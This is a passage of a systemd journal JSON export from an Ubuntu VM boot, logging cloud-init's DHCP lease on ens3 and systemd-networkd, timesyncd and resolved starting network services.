"10362362", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf 
/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPREQUEST of 192.168.10.95 on ens3 to 255.255.255.255 port 67 (xid=0x3597370f)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645465" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=230;b=e2b08827b5804427b422c10c84f1567e;m=9e1e64;t=5bd16dd619dcc;x=7a44fe3a0b1c8273", "__REALTIME_TIMESTAMP" : "1615280784645580", "__MONOTONIC_TIMESTAMP" : "10362468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPOFFER of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=231;b=e2b08827b5804427b422c10c84f1567e;m=9e25d3;t=5bd16dd61a53a;x=ae1b737a9207c09f", "__REALTIME_TIMESTAMP" : "1615280784647482", "__MONOTONIC_TIMESTAMP" : "10364371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPACK of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784647459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=232;b=e2b08827b5804427b422c10c84f1567e;m=9e9f06;t=5bd16dd621e6d;x=ceca2907bc6d18d2", "__REALTIME_TIMESTAMP" : "1615280784678509", "__MONOTONIC_TIMESTAMP" : "10395398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "bound to 192.168.10.95 -- renewal in 33503 seconds.", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280784678463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=233;b=e2b08827b5804427b422c10c84f1567e;m=2607d80;t=5bd16df23fce2;x=368d0957136c150f", "__REALTIME_TIMESTAMP" : "1615280814161122", "__MONOTONIC_TIMESTAMP" : "39878016", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_STREAM_ID" : "3a93b23a9c1d4fdab05d8cac63ea7d61", "SYSLOG_IDENTIFIER" : "cloud-init", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init-local' at Tue, 09 Mar 2021 09:06:24 +0000. Up 10.17 seconds.", "_PID" : "538", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init --local", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=234;b=e2b08827b5804427b422c10c84f1567e;m=261ff9d;t=5bd16df257f04;x=ecf128b801d4eacc", "__REALTIME_TIMESTAMP" : "1615280814259972", "__MONOTONIC_TIMESTAMP" : "39976861", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", 
"MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Initial cloud-init job (pre-networking).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814256658" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=235;b=e2b08827b5804427b422c10c84f1567e;m=2620480;t=5bd16df2583e7;x=6dd0ca85e60b6cf7", "__REALTIME_TIMESTAMP" : "1615280814261223", "__MONOTONIC_TIMESTAMP" : "39978112", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network (Pre).", "UNIT" : "network-pre.target", "INVOCATION_ID" : "b8f3685ee1a74adbac358b94e5d6fe6e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814261197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=236;b=e2b08827b5804427b422c10c84f1567e;m=2621764;t=5bd16df2596cb;x=f92c1cdfdc0c1137", "__REALTIME_TIMESTAMP" : "1615280814266059", "__MONOTONIC_TIMESTAMP" : "39982948", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : 
"unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Service...", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814266037" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=237;b=e2b08827b5804427b422c10c84f1567e;m=263a172;t=5bd16df2720d8;x=c41f1c6c3213eaa3", "__REALTIME_TIMESTAMP" : "1615280814366936", "__MONOTONIC_TIMESTAMP" : "40083826", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/network/networkd.c", "CODE_LINE" : "152", "CODE_FUNC" : "main", "SYSLOG_IDENTIFIER" : "systemd-networkd", "MESSAGE" : "Enumeration completed", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814366926" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=238;b=e2b08827b5804427b422c10c84f1567e;m=263b01f;t=5bd16df272f86;x=d6a27a130ebbab0d", "__REALTIME_TIMESTAMP" : "1615280814370694", "__MONOTONIC_TIMESTAMP" : "40087583", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "MESSAGE" : "Started Network Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814367603" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=239;b=e2b08827b5804427b422c10c84f1567e;m=263b0df;t=5bd16df273047;x=cb21fbb4e8b86f83", "__REALTIME_TIMESTAMP" : "1615280814370887", "__MONOTONIC_TIMESTAMP" : "40087775", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814370880" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23a;b=e2b08827b5804427b422c10c84f1567e;m=263b942;t=5bd16df2738a9;x=1e97fceaacf3cfab", "__REALTIME_TIMESTAMP" : 
"1615280814373033", "__MONOTONIC_TIMESTAMP" : "40089922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait for Network to be Configured...", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814371365" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23b;b=e2b08827b5804427b422c10c84f1567e;m=263bc5c;t=5bd16df273bc4;x=7f61a6b98bd750de", "__REALTIME_TIMESTAMP" : "1615280814373828", "__MONOTONIC_TIMESTAMP" : "40090716", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : 
"systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814373715" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23c;b=e2b08827b5804427b422c10c84f1567e;m=263be97;t=5bd16df273dfe;x=34004f7e7f9e3d76", "__REALTIME_TIMESTAMP" : "1615280814374398", "__MONOTONIC_TIMESTAMP" : "40091287", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374391" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23d;b=e2b08827b5804427b422c10c84f1567e;m=263bf93;t=5bd16df273efa;x=a5c3a6ccbdc3e536", "__REALTIME_TIMESTAMP" : "1615280814374650", "__MONOTONIC_TIMESTAMP" : "40091539", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : 
"/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "CODE_LINE" : "3437", "MESSAGE" : "ens3: Lost carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374644" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23e;b=e2b08827b5804427b422c10c84f1567e;m=263cc6e;t=5bd16df274bd6;x=d585f0cc41c21d03", "__REALTIME_TIMESTAMP" : "1615280814377942", "__MONOTONIC_TIMESTAMP" : "40094830", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-dhcp6.c", "CODE_LINE" : "40", "CODE_FUNC" : "dhcp6_verify_link", "INTERFACE" : "lo", "MESSAGE" : "lo: Link is not managed by us", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814377900" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23f;b=e2b08827b5804427b422c10c84f1567e;m=263d92b;t=5bd16df275892;x=e4cb284037fe65d3", "__REALTIME_TIMESTAMP" : "1615280814381202", "__MONOTONIC_TIMESTAMP" : "40098091", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", 
"CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Name Resolution...", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814379434" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=240;b=e2b08827b5804427b422c10c84f1567e;m=263db29;t=5bd16df275a91;x=9e4386d1737efb05", "__REALTIME_TIMESTAMP" : "1615280814381713", "__MONOTONIC_TIMESTAMP" : "40098601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "294", "CODE_FUNC" : "link_enable_ipv6", "MESSAGE" : "ens3: IPv6 successfully enabled", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814381705" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=241;b=e2b08827b5804427b422c10c84f1567e;m=264161f;t=5bd16df279586;x=b55c09cf1a27986a", "__REALTIME_TIMESTAMP" : "1615280814396806", "__MONOTONIC_TIMESTAMP" : "40113695", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814396796" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=242;b=e2b08827b5804427b422c10c84f1567e;m=26427f7;t=5bd16df27a75e;x=a6141f99eec106dd", "__REALTIME_TIMESTAMP" : "1615280814401374", "__MONOTONIC_TIMESTAMP" : "40118263", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "INTERFACE" : "ens3", "CODE_FILE" : "../src/network/networkd-dhcp4.c", "CODE_LINE" : "463", "CODE_FUNC" : "dhcp_lease_acquired", "MESSAGE" : "ens3: DHCPv4 address 192.168.10.95/24 via 192.168.10.1", "ADDRESS" : "192.168.10.95", "PREFIXLEN" : "24", "GATEWAY" : "192.168.10.1", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280814401328" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=243;b=e2b08827b5804427b422c10c84f1567e;m=2642895;t=5bd16df27a7fd;x=45c1cf1e9fb525a9", "__REALTIME_TIMESTAMP" : "1615280814401533", "__MONOTONIC_TIMESTAMP" : "40118421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : 